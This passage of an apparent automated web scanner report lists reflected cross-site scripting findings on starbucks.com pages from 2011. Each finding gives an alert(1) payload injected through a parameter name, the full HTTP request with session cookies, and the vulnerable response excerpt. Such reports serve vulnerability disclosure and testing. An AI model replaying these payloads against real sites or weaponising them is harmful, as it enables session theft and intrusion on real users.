2.37. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26c27"%3balert(1)//b005536df9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c27";alert(1)//b005536df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27"%3balert(1)//b005536df9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:06 GMT
Connection: close
Content-Length: 40941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "679100977001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27";alert(1)//b005536df9f=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.38. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c23"%3balert(1)//aabb77efc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c23";alert(1)//aabb77efc8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?51c23"%3balert(1)//aabb77efc8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:49 GMT
Connection: close
Content-Length: 40986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "731783176001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?51c23";alert(1)//aabb77efc8a=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.39. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056f"style%3d"x%3aexpression(alert(1))"74970e702cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056f"style="x:expression(alert(1))"74970e702cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style%3d"x%3aexpression(alert(1))"74970e702cd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:48 GMT
Connection: close
Content-Length: 41081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style="x:expression(alert(1))"74970e702cd=1" />
...[SNIP]...

2.40. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e73"style="x:expression(alert(1))"e0a45db438b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:34 GMT
Connection: close
Content-Length: 40877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style="x:expression(alert(1))"e0a45db438b=1" />
...[SNIP]...

2.41. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac74"%3balert(1)//93e8ea141e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac74";alert(1)//93e8ea141e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74"%3balert(1)//93e8ea141e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:37 GMT
Connection: close
Content-Length: 40777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
rs = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "735248429001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74";alert(1)//93e8ea141e=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.42. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46d0d"style="x:expression(alert(1))"aec8401d6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via?46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:48 GMT
Connection: close
Content-Length: 50393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?46d0d"style="x:expression(alert(1))"aec8401d6e5=1" />
...[SNIP]...

2.43. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c836e"%3balert(1)//ea1e4924121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c836e";alert(1)//ea1e4924121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/via?c836e"%3balert(1)//ea1e4924121=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:54 GMT
Connection: close
Content-Length: 50298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "620273805001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/via?c836e";alert(1)//ea1e4924121=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.44. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb780"style%3d"x%3aexpression(alert(1))"017ad330597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb780"style="x:expression(alert(1))"017ad330597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?bb780"style%3d"x%3aexpression(alert(1))"017ad330597=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:01 GMT
Connection: close
Content-Length: 50326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?bb780"style="x:expression(alert(1))"017ad330597=1" />
...[SNIP]...

2.45. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b90"style="x:expression(alert(1))"6c41d8ffcf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:06 GMT
Connection: close
Content-Length: 50600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?47b90"style="x:expression(alert(1))"6c41d8ffcf1=1" />
...[SNIP]...

2.46. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70376"style%3d"x%3aexpression(alert(1))"4e8579796e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70376"style="x:expression(alert(1))"4e8579796e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?70376"style%3d"x%3aexpression(alert(1))"4e8579796e6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:10 GMT
Connection: close
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?70376"style="x:expression(alert(1))"4e8579796e6=1" />
...[SNIP]...

2.47. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4774c"style="x:expression(alert(1))"403ec5c4484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:38 GMT
Connection: close
Content-Length: 42063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?4774c"style="x:expression(alert(1))"403ec5c4484=1" />
...[SNIP]...

2.48. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c4da"%3balert(1)//dbdcde42a66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c4da";alert(1)//dbdcde42a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/africa-arabia?2c4da"%3balert(1)//dbdcde42a66=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:41 GMT
Connection: close
Content-Length: 41968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101032001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?2c4da";alert(1)//dbdcde42a66=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.49. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f4f8"style="x:expression(alert(1))"3b6680e832f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/asia-pacific?6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:47 GMT
Connection: close
Content-Length: 41482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?6f4f8"style="x:expression(alert(1))"3b6680e832f=1" />
...[SNIP]...

2.50. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60e4f"%3balert(1)//ccc1047f29b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e4f";alert(1)//ccc1047f29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/asia-pacific?60e4f"%3balert(1)//ccc1047f29b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:53 GMT
Connection: close
Content-Length: 41387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
